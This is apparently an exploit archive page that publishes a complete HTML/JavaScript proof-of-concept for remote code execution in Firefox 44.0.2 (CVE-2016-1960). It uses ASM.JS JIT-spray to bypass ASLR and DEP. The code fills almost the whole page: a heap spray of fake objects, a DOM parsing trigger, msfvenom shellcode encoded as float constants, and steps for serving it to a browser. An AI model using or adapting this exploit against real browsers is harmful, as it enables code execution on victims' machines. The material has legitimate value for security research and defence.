what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Firefox 44.0.2 ASM.JS JIT-Spray Remote Code Execution

Firefox 44.0.2 ASM.JS JIT-Spray Remote Code Execution
Posted Mar 16, 2018
Authored by Rh0

Firefox version 44.0.2 ASM.JS JIT-Spray remote code execution exploit.

tags | exploit, remote, code execution
advisories | CVE-2016-1960, CVE-2017-5375
SHA-256 | f719f8ea47c6ce0616cd666a0782ec9a6974470b392ebbc5a822945312f3a613

Firefox 44.0.2 ASM.JS JIT-Spray Remote Code Execution

Change Mirror Download
<!DOCTYPE HTML>

<!--

FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
*PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960)
ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018

Tested on:
Firefox 44.0.2 32-bit - Windows 10 1709
https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe

Howto:
1) serve PoC over network and open it in Firefox 44.0.2 32-bit
2) A successfull exploit attempt should pop calc.exe

Mozilla Bug Report:
https://bugzilla.mozilla.org/show_bug.cgi?id=1246014


Writeup:
https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/


- For research purposes only -

(C) Rh0

Mar. 13, 2018

Notes:
*) very similar to CVE-2016-2819, but still different:
*) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1
because in 46.0.1 it is already fixed.
*) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it
was fixed in Firefox > 46.0.1

-->

<title>CVE-2016-1960 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"

var Exploit = function(){
this.asmjs = new Asmjs()
this.heap = new Heap()
}

Exploit.prototype.go = function(){
/* target address of fake node object */
var node_target_addr = 0x20200000

/* target address of asm.js float pool payload*/
var target_eip = 0x3c3c1dc8

/* spray fake Node objects */
this.heap.spray(node_target_addr, target_eip)

/* spray asm.js float constant pools */
this.asmjs.spray_float_payload(0x1800)

/* go! */
this.trigger_vuln(node_target_addr)
};


Exploit.prototype.trigger_vuln = function(node_ptr){
document.body.innerHTML = '<table><svg><div id="AAAA">'
this.heap.gc()
var a = new Array()
for (var i=0; i < 0x11000; i++){
/* array element (Node object ptr) control with integer underflow */
a[i] = new Uint32Array(0x100/4)
for (var j=0; j<0x100/4; j++)
a[i][j] = node_ptr
}

/* original crashing testcase
document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';
*/

/* easier to exploit codepath */
document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';

window.location.reload()
};


var Asmjs = function(){};

Asmjs.prototype.asm_js_module = function(stdlib, ffi){
"use asm"
var foo = ffi.foo
function payload(){
var val = 0.0
/* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/
val = +foo(
// $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
-1.587865768352248e-263,
-8.692422460804815e-255,
7.529882109376901e-114,
2.0120602207293977e-16,
3.7204662687249914e-242,
4.351158092040946e+89,
2.284741716118451e+270,
7.620699014501263e-153,
5.996021286047645e+44,
-5.981935902612295e-92,
6.23540918304361e+259,
1.9227873281657598e+256,
2.0672493951546363e+187,
-6.971032919585734e+91,
5.651413300798281e-134,
-1.9040061366251406e+305,
-1.2687640718807038e-241,
9.697849844423e-310,
-2.0571400761625145e+306,
-1.1777948610587587e-123,
2.708909852013898e+289,
3.591750823735296e+37,
-1.7960516725035723e+106,
6.326776523166028e+180
)
return +val;
}
return payload
};

Asmjs.prototype.spray_float_payload = function(regions){
this.modules = new Array(regions).fill(null).map(
region => this.asm_js_module(window, {foo: () => 0})
)
};

var Heap = function(target_addr, eip){
this.node_heap = []
};


Heap.prototype.spray = function(node_target_addr, target_eip){
var junk = 0x13371337
var current_address = 0x08000000
var block_size = 0x1000000
while(current_address < node_target_addr){
var fake_objects = new Uint32Array(block_size/4 - 0x100)
for (var offset = 0; offset < block_size; offset += 0x100000){
/* target Node object needed to control EIP */
fake_objects[offset/4 + 0x00/4] = 0x29
fake_objects[offset/4 + 0x0c/4] = 3
fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
fake_objects[offset/4 + 0x18/4] = 1
fake_objects[offset/4 + 0x1c/4] = junk
fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
fake_objects[offset/4 + 0x2c/4] = target_eip
}
this.node_heap.push(fake_objects)
current_address += block_size
}
};

Heap.prototype.gc = function(){
for (var i=0; i<=10; i++)
var x = new ArrayBuffer(0x1000000)
};

</script>
<head>
<body onload='exploit = new Exploit(); exploit.go()' />

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close